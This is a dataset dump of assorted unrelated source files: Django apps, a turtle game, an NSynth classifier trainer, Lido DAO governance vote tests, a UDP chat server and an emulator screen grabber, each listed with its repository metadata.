seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
6882747948 | # Строка содержит набор чисел. Показать большее и меньшее число. Символ-разделитель - пробел
def String_Min_and_Max(str):
list1 = str.split(' ')
min = int(list1[0])
max = int(list1[0])
for i in range(len(list1)):
list1[i] = int(list1[i])
if list1[i] < min:
min = list1[i]
if list1[i] > max:
max = list1[i]
return min, max
a = input('Введите строку, состоящую из набора чисел. В качестве символа-разделителя используйте пробел ')
print(String_Min_and_Max(a)) | AlbertKhismatullin/Python_HomeWork | Task27.py | Task27.py | py | 681 | python | ru | code | 0 | github-code | 36 |
75312911145 | import matplotlib.pyplot as plt
from moisture_tracers import plotdir
from moisture_tracers.plot.figures.fig2_satellite_comparison import make_plot
def main():
start_time = "20200201"
grid = "lagrangian_grid"
resolutions = ["km1p1", "km2p2", "km4p4"]
lead_times = [30, 36, 42, 48]
make_plot(start_time, grid, resolutions, lead_times)
plt.savefig(
plotdir + "fig4_satellite_comparison_{}_{}.png".format(start_time, grid)
)
if __name__ == "__main__":
import warnings
warnings.filterwarnings("ignore")
main()
| leosaffin/moisture_tracers | moisture_tracers/plot/figures/fig4_satellite_comparison_lagrangian_grid.py | fig4_satellite_comparison_lagrangian_grid.py | py | 560 | python | en | code | 0 | github-code | 36 |
27140115657 | # -*- coding: utf-8 -*-
#######################
# deploy.urls
#######################
"""
1. 部署服务
2. add DNS
3. nginx设置
4. config check
5. 诊断
"""
from django.urls import path
from deploy import views
urlpatterns = [
path('health/', views.health,name="health"),
path('start/',views.deploy,name="deploy"),
path('setNginx/<env>/<target>/<project>/',views.set_project_nginx,name="set_project_nginx"),
path('addDNS/<env>/<project>/',views.add_project_dns,name="add_project_dns"),
path('configCheck/<project>/',views.project_config_check,name="project_config_check"),
path('diagnose/<project>/',views.diagnose_project,name="diagnose_project"),
]
| yuzhenduan/envDeploy | deploy/urls.py | urls.py | py | 691 | python | en | code | 0 | github-code | 36 |
14076203382 | import time
from turtle import Screen
from player import Player
from car_manager import CarManager
from scoreboard import Scoreboard
# SETUP SCREEN
screen = Screen()
screen.setup(width=600, height=600)
screen.bgcolor('black')
screen.tracer(0)
# SETUP CARS, TURTLE, SCOREBORAD AND STREET BACKGROUND
car = CarManager()
turtle = Player()
score = Scoreboard()
score.draw_walls()
# ACTIVATE KEY FUNCTIONALITY
screen.listen()
screen.onkey(key='Up', fun=turtle.move)
screen.onkey(key='Down', fun=turtle.move_back)
# VARIABLE LOOP COUNTER
loop_count = 0
# RUN GAME ON WHILE LOOP
game_is_on = True
while game_is_on:
time.sleep(0.1)
screen.update()
# SLOW DOWN CAR GENERATION GIVEN CAR LANES
if loop_count % 12 == 0:
car.top_lane()
car.top_center_lane()
car.bottom_center_lane()
if loop_count % 20 == 0:
car.bottom_lane()
# REGULATE CAR SPEEDS
car.move_fast(30)
car.move_regular(20)
car.move_slow(10)
car.move_super_slow(5)
# COUNT LOOP
loop_count += 1
# TRACK EACH CAR'S INDIVIDUAL POSITION
for item in range(len(car.master_list)):
y = car.master_list[item].ycor()
x = car.master_list[item].xcor()
turtle_y = turtle.player.ycor()
turtle_x = turtle.player.xcor()
y_dif = y - turtle_y
x_dif = x - turtle_x
# ADD SCORE IF TURTLE REACHES OTHER SIDE OF THE HIGHWAY AND TAKE TURTLE BACK TO START
if turtle_y == 250:
score.increase_score()
turtle.player.goto(500, 250)
turtle.player.goto(500, -250)
turtle.player.goto(0, -250)
# GAME OVER IF A COLLISION IS DETECTED
if -20 < y_dif < 20 and -20 < x_dif < 20:
game_is_on = False
score.game_over()
screen.exitonclick()
| rivelez65/turtle-crossing-arcade_OOP-Turtle | main.py | main.py | py | 1,803 | python | en | code | 1 | github-code | 36 |
2153986094 | from django.shortcuts import render
# Create your views here.
def func(request, num1, num2):
if num2 != 0:
div = num1 / num2
else:
div = '계산할 수 없습니다.'
context = {
'num1' : num1,
'num2' : num2,
'sub' : num1 - num2,
'mul' : num1 * num2,
'div' : div
}
return render(request, 'calculators/calculator.html', context)
| ji-hyon/Web_study | Django/practice/part2_Django/django_2_2/project2/calculators/views.py | views.py | py | 406 | python | en | code | 0 | github-code | 36 |
14128946048 | #!/usr/local/bin/ python3
# -*- coding:utf-8 -*-
# __author__ = "zenmeder"
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def inorderTraversal(self, root):
res, stack = [], []
while True:
while root:
stack.append(root)
root = root.left
if not stack:
return res
node = stack.pop()
res.append(node.val)
root = node.right
a = TreeNode(1)
b = TreeNode(2)
c = TreeNode(3)
a.right = b
b.left = c
print(Solution().inorderTraversal(a))
| zenmeder/leetcode | 94.py | 94.py | py | 579 | python | en | code | 0 | github-code | 36 |
10197349809 | # nosetests --nocapture tests/test_record.py
import unittest
from fit_tool.definition_message import DefinitionMessage
from fit_tool.profile.messages.workout_step_message import WorkoutStepMessage
from fit_tool.record import RecordHeader, Record
class TestRecord(unittest.TestCase):
def shortDescription(self):
return None
def test_normal_record_header(self):
"""Test packing and unpacking of normal record header.
"""
expected_rh = RecordHeader(is_definition=True,
local_id=RecordHeader.MAX_NORMAL_LOCAL_ID)
bytes1 = expected_rh.to_bytes()
rh = RecordHeader.from_bytes(bytes1)
bytes2 = rh.to_bytes()
self.assertEqual(bytes2, bytes1)
self.assertEqual(rh, expected_rh)
def test_compressed_timestamp_record_header(self):
"""Test packing and unpacking of a compressed timestamp header.
"""
expected_rh = RecordHeader(is_time_compressed=True,
local_id=3,
time_offset_seconds=10)
bytes1 = expected_rh.to_bytes()
rh = RecordHeader.from_bytes(bytes1)
bytes2 = rh.to_bytes()
self.assertEqual(bytes2, bytes1)
def test_record_pack_unpack(self):
"""Test packing and unpacking of a record
"""
local_id = 15
dm1 = WorkoutStepMessage(local_id=local_id)
dm1.workout_step_name = 'test'
record1 = Record.from_message(dm1)
bytes1 = record1.to_bytes()
definition_message = DefinitionMessage.from_data_message(dm1)
record2 = Record.from_bytes(definition_messages={local_id: definition_message}, bytes_buffer=bytes1)
bytes2 = record2.to_bytes()
self.assertEqual(bytes2, bytes1)
def test_record_to_row(self):
"""Test record to_row
"""
local_id = 15
dm1 = WorkoutStepMessage(local_id=local_id)
dm1.workout_step_name = 'test'
record1 = Record.from_message(dm1)
print(record1.to_row())
| soh55/python_fit_tool | fit_tool/tests/test_record.py | test_record.py | py | 2,080 | python | en | code | 0 | github-code | 36 |
71355007785 | import dotenv
import openai
import os
dotenv.load_dotenv('../.env')
openai.api_key = os.environ["OPENAI_API_KEY"]
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=[
{"role": "user", "content": "tell me about gpt for social good"}
]
)
print(response["choices"][0]["message"]["content"]) | aiformankind/gpt-for-social-good | gpt/demo.py | demo.py | py | 330 | python | en | code | 0 | github-code | 36 |
71249335464 | """
NSynth classification using PyTorch
Authors: Japheth Adhavan, Jason St. George
Reference: Sasank Chilamkurthy <https://chsasank.github.io>
"""
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import numpy as np
import utils
import models
import data
import visualize
import time
import os
import argparse
import logging
logging.basicConfig(level=logging.INFO)
gpu_idx = utils.get_free_gpu()
device = torch.device("cuda:{}".format(gpu_idx))
logging.info("Using device cuda:{}".format(gpu_idx))
def train_model(model, dataloaders, criterion, optimizer, scheduler, network_type, num_epochs=10):
"""
:param model:
:param criterion:
:param optimizer:
:param scheduler:
:param num_epochs:
:return:
"""
since = time.time()
best_model_wts = model.state_dict()
best_acc = 0.0
dataset_sizes = {x: len(dataloaders[x].dataset) for x in ["train", "val"]}
model_loss = {x: [0 for _ in range(num_epochs)] for x in ["train", "val"]}
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch + 1, num_epochs))
print('-' * 10)
for phase in ['train', 'val']:
if phase == 'train':
scheduler.step()
model.train()
else:
model.eval()
running_loss = 0.0
running_corrects = 0
# iterate over data
for batch_idx, (samples, labels, targets) in enumerate(dataloaders[phase]):
inputs = samples.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# aggregate statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
if phase == 'train' and batch_idx % 50 == 0:
logging.info('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
(epoch + 1),
(batch_idx + 1) * len(samples),
dataset_sizes[phase],
100. * (batch_idx + 1) / len(dataloaders[phase]),
loss.item()))
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
model_loss[phase][epoch] = epoch_loss
logging.info('{} Loss: {:.4f} Acc: {:.4f}'.format(
phase.capitalize(), epoch_loss, epoch_acc))
# deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = model.state_dict()
torch.save(best_model_wts, "./models/{}Network.pt".format(network_type))
print()
time_elapsed = time.time() - since
logging.info('Training completed in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
logging.info('Best overall val Acc: {:4f}'.format(best_acc))
# load best model weights
model.load_state_dict(best_model_wts)
return model, model_loss
# def test(model, dataloader):
# spreads = [[0 for y in range(10)] for x in range(10)]
# test_c = [0 for x in range(10)]
# test_t = [0 for x in range(10)]
# c_done = [False for x in range(10)]
# i_done = [False for x in range(10)]
# c_samples, i_samples = 0, 0
# y_test, y_pred = [], []
#
# correct = (preds == labels).squeeze()
# np_predicted = preds.cpu().numpy() # Get vector of int class output labels
# y_pred.extend(np_predicted)
# y_test.extend(if_label.cpu().numpy())
#
# if i_samples < 10 and c_samples < 10:
# for i in range(len(outputs)):
# label = str(labels[i]) # e.g. 'tensor(0)'
# label = int(label[7]) # 0
# test_c[label] += correct[i].item()
# test_t[label] += 1
#
# if np_predicted[i] != label:
# spreads[label][np_predicted[i]] += 1
# if i_samples < 10:
# i_samples += visualize.save_samples(inputs[i],
# np_predicted[i], label,
# i_done, False, CLASS_NAMES)
# else:
# if c_samples < 10:
# c_samples += visualize.save_samples(inputs[i], None, label,
# c_done, True, CLASS_NAMES)
def test(model, test_loader, criterion, classes):
model.eval()
test_loss = 0
correct = 0
no_of_classes = len(classes)
spread = [([0] * no_of_classes) for _ in range(no_of_classes)]
examples = [{} for _ in range(no_of_classes)]
y_test, y_pred = [], []
with torch.no_grad():
for data, labels, target in test_loader:
data, labels = data.to(device), labels.to(device)
output = model(data)
test_loss += criterion(output, labels).item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
actual = labels.view_as(pred)
is_correct = pred.equal(actual)
label_actual = int(labels) if int(labels) < 9 else 9
label_pred = int(pred) if int(pred) < 9 else 9
spread[label_actual][label_pred] += 1
correct += 1 if is_correct else 0
examples[label_actual][is_correct] = (data, label_pred)
y_pred.append(label_pred)
y_test.append(label_actual)
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
return y_test, y_pred, spread, examples
def main(args):
np.warnings.filterwarnings('ignore')
os.makedirs("./graphs", exist_ok=True)
os.makedirs("./models", exist_ok=True)
model = {
"Simple": models.SimpleNetwork,
"Epic" : models.EpicNetwork,
"Bonus" : models.BonusNetwork
}[args.network]().to(device)
classes = ['bass', 'brass', 'flute', 'guitar', 'keyboard',
'mallet', 'organ', 'reed', 'string', 'vocal']
if args.network == "Bonus":
classes = ['acoustic', 'electronic', 'synthetic']
model.double()
criterion = nn.CrossEntropyLoss()
optimizer_conv = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=args.step, gamma=args.gamma)
if not args.test:
train_loader = data.get_data_loader("train", batch_size=args.batch_size,
shuffle=True, num_workers=4, network=args.network)
valid_loader = data.get_data_loader("valid", network=args.network)
dataloaders = {
"train": train_loader,
"val": valid_loader
}
logging.info('Training...')
model, model_loss = train_model(model, dataloaders,
criterion, optimizer_conv,
exp_lr_scheduler,
args.network,
num_epochs=args.epochs)
visualize.plot_loss(model_loss, "{}Network".format(args.network))
else:
logging.info('Testing...')
model.load_state_dict(torch.load("./models/{}Network.pt".format(args.network)))
test_loader = data.get_data_loader("test", network=args.network)
y_test, y_pred, spreads, examples = test(model, test_loader, criterion, classes)
visualize.plot_histograms(classes, spreads, type=args.network)
visualize.plot_confusion_matrix(y_test, y_pred, classes, type=args.network)
visualize.save_samples(examples, classes)
logging.info('Completed Successfully!')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='NSynth classifier')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test', action='store_true', default=False,
help='disables training, loads model')
parser.add_argument('--network', default='Epic', const='Epic', nargs="?", choices=['Simple', 'Epic', 'Bonus'],
help='Choose the type of network from Simple, Epic and Bonus (default: Epic)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--step', type=int, default=3, metavar='N',
help='number of epochs to decrease learn-rate (default: 3)')
parser.add_argument('--gamma', type=float, default=0.1, metavar='N',
help='factor to decrease learn-rate (default: 0.1)')
main(parser.parse_args()) | ifrit98/NSynth_Classification_CNN | src/main.py | main.py | py | 9,785 | python | en | code | 1 | github-code | 36 |
5547407739 | """
Tests for voting 31/01/2023.
"""
from scripts.vote_2023_01_31 import start_vote
from brownie import chain, accounts
from brownie.network.transaction import TransactionReceipt
from eth_abi.abi import encode_single
from utils.config import network_name
from utils.test.tx_tracing_helpers import *
from utils.test.event_validators.easy_track import (
validate_evmscript_factory_added_event,
EVMScriptFactoryAdded,
validate_evmscript_factory_removed_event,
)
from utils.easy_track import create_permissions
from utils.agent import agent_forward
from utils.voting import create_vote, bake_vote_items
eth = "0x0000000000000000000000000000000000000000"
def test_vote(
helpers,
accounts,
vote_id_from_env,
bypass_events_decoding,
unknown_person,
interface,
ldo_holder,
):
dai_token = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
allowed_recipients = [
accounts.at("0xaf8aE6955d07776aB690e565Ba6Fbc79B8dE3a5d", {"force": True}),
accounts.at("0x558247e365be655f9144e1a0140D793984372Ef3", {"force": True}),
accounts.at("0x53773E034d9784153471813dacAFF53dBBB78E8c", {"force": True}),
accounts.at("0xC976903918A0AF01366B31d97234C524130fc8B1", {"force": True}),
accounts.at("0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9", {"force": True}),
accounts.at("0x82AF9d2Ea81810582657f6DC04B1d7d0D573F616", {"force": True}),
accounts.at("0x586b9b2F8010b284A0197f392156f1A7Eb5e86e9", {"force": True}),
accounts.at("0x883f91D6F3090EA26E96211423905F160A9CA01d", {"force": True}),
accounts.at("0x351806B55e93A8Bcb47Be3ACAF71584deDEaB324", {"force": True}),
accounts.at("0xf6502Ea7E9B341702609730583F2BcAB3c1dC041", {"force": True}),
accounts.at("0xDB2364dD1b1A733A690Bf6fA44d7Dd48ad6707Cd", {"force": True}),
accounts.at("0xF930EBBd05eF8b25B1797b9b2109DDC9B0d43063", {"force": True}),
accounts.at("0x6DC9657C2D90D57cADfFB64239242d06e6103E43", {"force": True}),
accounts.at("0x13C6eF8d45aFBCcF15ec0701567cC9fAD2b63CE8", {"force": True}),
]
finance = interface.Finance("0xB9E5CBB9CA5b0d659238807E84D0176930753d86")
dao_voting = interface.Voting("0x2e59A20f205bB85a89C53f1936454680651E618e")
easy_track = interface.EasyTrack("0xF0211b7660680B49De1A7E9f25C65660F0a13Fea")
referral_dai_registry = interface.AllowedRecipientRegistry("0xa295C212B44a48D07746d70d32Aa6Ca9b09Fb846")
referral_dai_topup_factory = interface.TopUpAllowedRecipients("0x009ffa22ce4388d2F5De128Ca8E6fD229A312450")
referral_dai_add_recipient_factory = interface.AddAllowedRecipient("0x8F06a7f244F6Bb4B68Cd6dB05213042bFc0d7151")
referral_dai_remove_recipient_factory = interface.RemoveAllowedRecipient("0xd8f9B72Cd97388f23814ECF429cd18815F6352c1")
referral_program_multisig = accounts.at("0xe2A682A9722354D825d1BbDF372cC86B2ea82c8C", {"force": True})
rewards_topup_factory_old = interface.IEVMScriptFactory("0x77781A93C4824d2299a38AC8bBB11eb3cd6Bc3B7")
rewards_add_factory_old = interface.IEVMScriptFactory("0x9D15032b91d01d5c1D940eb919461426AB0dD4e3")
rewards_remove_factory_old = interface.IEVMScriptFactory("0xc21e5e72Ffc223f02fC410aAedE3084a63963932")
old_factories_list = easy_track.getEVMScriptFactories()
assert len(old_factories_list) == 15
assert referral_dai_topup_factory not in old_factories_list
assert referral_dai_add_recipient_factory not in old_factories_list
assert referral_dai_remove_recipient_factory not in old_factories_list
assert rewards_topup_factory_old in old_factories_list
assert rewards_add_factory_old in old_factories_list
assert rewards_remove_factory_old in old_factories_list
##
## START VOTE
##
vote_id = vote_id_from_env or start_vote({"from": ldo_holder}, silent=True)[0]
tx: TransactionReceipt = helpers.execute_vote(
vote_id=vote_id, accounts=accounts, dao_voting=dao_voting, skip_time=3 * 60 * 60 * 24
)
updated_factories_list = easy_track.getEVMScriptFactories()
assert len(updated_factories_list) == 15
# 1. Add Referral program DAI top up EVM script factory 0x009ffa22ce4388d2F5De128Ca8E6fD229A312450 to Easy Track
assert referral_dai_topup_factory in updated_factories_list
create_and_enact_payment_motion(
easy_track,
referral_program_multisig,
referral_dai_topup_factory,
dai_token,
allowed_recipients,
[10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18,10 * 10**18, 10 * 10**18],
unknown_person,
)
check_add_and_remove_recipient_with_voting(referral_dai_registry, helpers, ldo_holder, dao_voting)
# 2. Add Referral program DAI add recipient EVM script factory 0x8F06a7f244F6Bb4B68Cd6dB05213042bFc0d7151 to Easy Track
assert referral_dai_add_recipient_factory in updated_factories_list
create_and_enact_add_recipient_motion(
easy_track,
referral_program_multisig,
referral_dai_registry,
referral_dai_add_recipient_factory,
unknown_person,
"",
ldo_holder,
)
# 3. Add Referral program DAI remove recipient EVM script factory 0xd8f9B72Cd97388f23814ECF429cd18815F6352c1 to Easy Track
assert referral_dai_remove_recipient_factory in updated_factories_list
create_and_enact_remove_recipient_motion(
easy_track,
referral_program_multisig,
referral_dai_registry,
referral_dai_remove_recipient_factory,
unknown_person,
ldo_holder,
)
# 4. Remove reWARDS top up EVM script factory (old ver) 0x77781A93C4824d2299a38AC8bBB11eb3cd6Bc3B7 from Easy Track
assert rewards_topup_factory_old not in updated_factories_list
# 5. Remove reWARDS add recipient EVM script factory (old ver) 0x9D15032b91d01d5c1D940eb919461426AB0dD4e3 from Easy Track
assert rewards_add_factory_old not in updated_factories_list
# 6. Remove reWARDS remove recipient EVM script factory (old ver) 0xc21e5e72Ffc223f02fC410aAedE3084a63963932 from Easy Track
assert rewards_remove_factory_old not in updated_factories_list
# validate vote events
assert count_vote_items_by_events(tx, dao_voting) == 6, "Incorrect voting items count"
display_voting_events(tx)
if bypass_events_decoding or network_name() in ("goerli", "goerli-fork"):
return
evs = group_voting_events(tx)
validate_evmscript_factory_added_event(
evs[0],
EVMScriptFactoryAdded(
factory_addr=referral_dai_topup_factory,
permissions=create_permissions(finance, "newImmediatePayment")
+ create_permissions(referral_dai_registry, "updateSpentAmount")[2:],
),
)
validate_evmscript_factory_added_event(
evs[1],
EVMScriptFactoryAdded(
factory_addr=referral_dai_add_recipient_factory,
permissions=create_permissions(referral_dai_registry, "addRecipient"),
),
)
validate_evmscript_factory_added_event(
evs[2],
EVMScriptFactoryAdded(
factory_addr=referral_dai_remove_recipient_factory,
permissions=create_permissions(referral_dai_registry, "removeRecipient"),
),
)
validate_evmscript_factory_removed_event(evs[3], rewards_topup_factory_old)
validate_evmscript_factory_removed_event(evs[4], rewards_add_factory_old)
validate_evmscript_factory_removed_event(evs[5], rewards_remove_factory_old)
def _encode_calldata(signature, values):
return "0x" + encode_single(signature, values).hex()
def create_and_enact_payment_motion(
easy_track,
trusted_caller,
factory,
token,
recievers,
transfer_amounts,
stranger,
):
agent = accounts.at("0x3e40D73EB977Dc6a537aF587D48316feE66E9C8c", {"force": True})
agent_balance_before = balance_of(agent, token)
recievers_balance_before = [balance_of(reciever, token) for reciever in recievers]
motions_before = easy_track.getMotions()
recievers_addresses = [reciever.address for reciever in recievers]
calldata = _encode_calldata("(address[],uint256[])", [recievers_addresses, transfer_amounts])
tx = easy_track.createMotion(factory, calldata, {"from": trusted_caller})
motions = easy_track.getMotions()
assert len(motions) == len(motions_before) + 1
chain.sleep(60 * 60 * 24 * 3)
chain.mine()
easy_track.enactMotion(
motions[-1][0],
tx.events["MotionCreated"]["_evmScriptCallData"],
{"from": stranger},
)
recievers_balance_after = [balance_of(reciever, token)for reciever in recievers]
for i in range(len(recievers)):
assert recievers_balance_after[i] == recievers_balance_before[i] + transfer_amounts[i]
agent_balance_after = balance_of(agent, token)
assert agent_balance_after == agent_balance_before - sum(transfer_amounts)
def balance_of(address, token):
if token == eth:
return address.balance()
else:
return token.balanceOf(address)
def create_and_enact_add_recipient_motion(
easy_track,
trusted_caller,
registry,
factory,
recipient,
title,
stranger,
):
recipients_count = len(registry.getAllowedRecipients())
assert not registry.isRecipientAllowed(recipient)
motions_before = easy_track.getMotions()
calldata = _encode_calldata("(address,string)", [recipient.address, title])
tx = easy_track.createMotion(factory, calldata, {"from": trusted_caller})
motions = easy_track.getMotions()
assert len(motions) == len(motions_before) + 1
chain.sleep(60 * 60 * 24 * 3)
chain.mine()
easy_track.enactMotion(
motions[-1][0],
tx.events["MotionCreated"]["_evmScriptCallData"],
{"from": stranger},
)
assert len(registry.getAllowedRecipients()) == recipients_count + 1
assert registry.isRecipientAllowed(recipient)
def create_and_enact_remove_recipient_motion(
easy_track,
trusted_caller,
registry,
factory,
recipient,
stranger,
):
recipients_count = len(registry.getAllowedRecipients())
assert registry.isRecipientAllowed(recipient)
motions_before = easy_track.getMotions()
calldata = _encode_calldata("(address)", [recipient.address])
tx = easy_track.createMotion(factory, calldata, {"from": trusted_caller})
motions = easy_track.getMotions()
assert len(motions) == len(motions_before) + 1
chain.sleep(60 * 60 * 24 * 3)
chain.mine()
easy_track.enactMotion(
motions[-1][0],
tx.events["MotionCreated"]["_evmScriptCallData"],
{"from": stranger},
)
assert len(registry.getAllowedRecipients()) == recipients_count - 1
assert not registry.isRecipientAllowed(recipient)
def check_add_and_remove_recipient_with_voting(registry, helpers, ldo_holder, dao_voting):
recipient_candidate = accounts[0]
title = ""
recipients_length_before = len(registry.getAllowedRecipients())
assert not registry.isRecipientAllowed(recipient_candidate)
call_script_items = [
agent_forward(
[
(
registry.address,
registry.addRecipient.encode_input(recipient_candidate, title),
)
]
)
]
vote_desc_items = ["Add recipient"]
vote_items = bake_vote_items(vote_desc_items, call_script_items)
vote_id = create_vote(vote_items, {"from": ldo_holder})[0]
helpers.execute_vote(
vote_id=vote_id,
accounts=accounts,
dao_voting=dao_voting,
skip_time=3 * 60 * 60 * 24,
)
assert registry.isRecipientAllowed(recipient_candidate)
assert len(registry.getAllowedRecipients()) == recipients_length_before + 1, 'Wrong whitelist length'
call_script_items = [
agent_forward(
[
(
registry.address,
registry.removeRecipient.encode_input(recipient_candidate),
)
]
)
]
vote_desc_items = ["Remove recipient"]
vote_items = bake_vote_items(vote_desc_items, call_script_items)
vote_id = create_vote(vote_items, {"from": ldo_holder})[0]
helpers.execute_vote(
vote_id=vote_id,
accounts=accounts,
dao_voting=dao_voting,
skip_time=3 * 60 * 60 * 24,
)
assert not registry.isRecipientAllowed(recipient_candidate)
assert len(registry.getAllowedRecipients()) == recipients_length_before, 'Wrong whitelist length'
| lidofinance/scripts | archive/tests/test_2023_01_31.py | test_2023_01_31.py | py | 12,625 | python | en | code | 14 | github-code | 36 |
21886050699 | # %% [markdown]
# Perl map functions
# %%
def solution(A,B):
lengthA = len(A)
hashA = {}
hashB = {}
j=0
k=0
sumA = 0
sumB = 0
for i in A:
sumA+=i
hashA[j]=sumA
j+=1
for i in B:
sumB+=i
hashB[k]=sumB
k+=1
allValues = []
for i in hashA:
print(i)
if hashA[i] == hashB[i]:
allValues.append(i)
fair = min(allValues)
print(hashA,hashB,fair)
A = [3, 2, 6]
B = [4, 1, 6]
solution(A,B)
| ashwanijha/pythonCodes | FAIRNumber.PY | FAIRNumber.PY | py | 518 | python | en | code | 0 | github-code | 36 |
31803136505 | import socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind(("127.0.0.1", 5050))
print ("Server started")
registered=[]
def new_client(message, caddr):
print("Connection from: " + str(caddr[0]+":"+str(caddr[1])))
data = message
if str(data).startswith('Signin'):
name = str(data).replace('Signin ', '')
user={"name": name, "ip": caddr}
registered.append(user)
data="\n\033[92m(!)\033[0m Registered, welcome \033[92m"+name+"\033[0m"
print (str(caddr)+" / " + name +" - registered!")
server_socket.sendto(data.encode(), caddr)
callback_message="\n\033[92m(!)\033[0m \033[92m"+name+"\033[0m has signed in"
for user in registered:
if user["ip"] != caddr:
server_socket.sendto(callback_message.encode(), user["ip"])
elif str(data).startswith('Signout'):
for user in registered:
if user["ip"]==caddr:
registered.remove(user)
data="\n\033[92m(!)\033[0m Signed out, goodbye \033[92m"+user["name"]+"\033[0m"
server_socket.sendto(data.encode(), user["ip"])
callback_message="\n\033[92m(!)\033[0m \033[92m"+user["name"]+"\033[0m has signed out"
for user in registered:
if user["ip"] != caddr:
server_socket.sendto(callback_message.encode(), user["ip"])
elif str(data).startswith('Message'):
message = str(data).replace('Message ', '')
callback_message=""
cnt_received=0
delivered=False
for user in registered:
if user["ip"] == caddr:
callback_message="\033[1m"+user["name"]+":\033[0m "+message
for user in registered:
# if user["ip"] != caddr:
server_socket.sendto(callback_message.encode(), user["ip"])
cnt_received+=1
delivered=True
if cnt_received==0:
msg="\n\033[91m(!)\033[0m No users online\n"
server_socket.sendto(msg.encode(), caddr)
if delivered==False:
msg="\n\033[91m(!)\033[0m Message not delivered\n"
server_socket.sendto(msg.encode(), caddr)
while True:
message, address = server_socket.recvfrom(1024)
new_client(message.decode(), address)
| root-dm/python-socket | udp/server.py | server.py | py | 2,343 | python | en | code | 0 | github-code | 36 |
6415147937 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 15 18:08:59 2021
@author: Chris
"""
#%% Imports
from PIL import ImageGrab
import win32gui
import numpy as np
import time
import cv2
#%% Get the ID of the Emulator window
# List to hold window information
window = []
# Name of the window to find
window_name = "Super Street Fighter II (USA) - Snes9x 1.60"
# Function to extract emulator window information
# Given a window and checks if its visible and if it matches the required name
# IF the above are true then we add the information to the window list
def winEnumHandler(hwnd, ctx, window_name=window_name):
if win32gui.IsWindowVisible(hwnd):
print(win32gui.GetWindowText(hwnd))
if win32gui.GetWindowText(hwnd) == window_name:
window.append(hwnd)
window.append(win32gui.GetWindowText(hwnd))
# Function to get the screen
# Uses the enumerate windows function from wn32gui with our handler to get the
# correct window.
win32gui.EnumWindows(winEnumHandler, None)
#%% Window streaming
# Pixelwise relative corrections for the window bounding box
screen_correction = np.array([-8,-51,8,8])
# Loop to capture the window
while True:
try:
# Get the start time
start_time = time.time()
# Get the bounding box for the window
bbox = np.array(win32gui.GetWindowRect(window[0]))
# Correct the window size
bbox = tuple(bbox - screen_correction)
# Get the screen capture
screen_grab = np.array(ImageGrab.grab(bbox))
# Prints the time it took to collect the screenshot
print(f"loop took {time.time()-start_time} seconds")
# Reset the start time for the next loop
start_time=time.time()
# Display the image in a new window
cv2.imshow("window", cv2.cvtColor(screen_grab, cv2.COLOR_BGR2RGB))
# Checks to see if window should be closed and loop stopped
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
except Exception as e:
print("error", e)
# %%
| qchrisd/StreetFighterBot | ScreenGrabProof.py | ScreenGrabProof.py | py | 2,115 | python | en | code | 0 | github-code | 36 |
39627512703 | import sys
import argparse
from lettuce.bin import main as lettuce_main
from lettuce import world
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from salad.steps.everything import *
from salad.terrains.everything import *
BROWSER_CHOICES = [browser.lower()
for browser in DesiredCapabilities.__dict__.keys()
if not browser.startswith('_')]
BROWSER_CHOICES.sort()
DEFAULT_BROWSER = 'firefox'
class store_driver_and_version(argparse.Action):
drivers = BROWSER_CHOICES
def __call__(self, parser, namespace, values, option_string=None):
driver_info = values.split('-')
if driver_info[0] not in self.drivers:
args = {'driver': driver_info[0],
'choices': ', '.join(map(repr, self.drivers))}
message = 'invalid choice: %(driver)r (choose from %(choices)s)'
raise argparse.ArgumentError(self, message % args)
setattr(namespace, self.dest, driver_info[0])
if len(driver_info) > 1:
setattr(namespace, 'version', driver_info[1])
if len(driver_info) > 2:
setattr(namespace, 'platform', driver_info[2].replace('_', ' '))
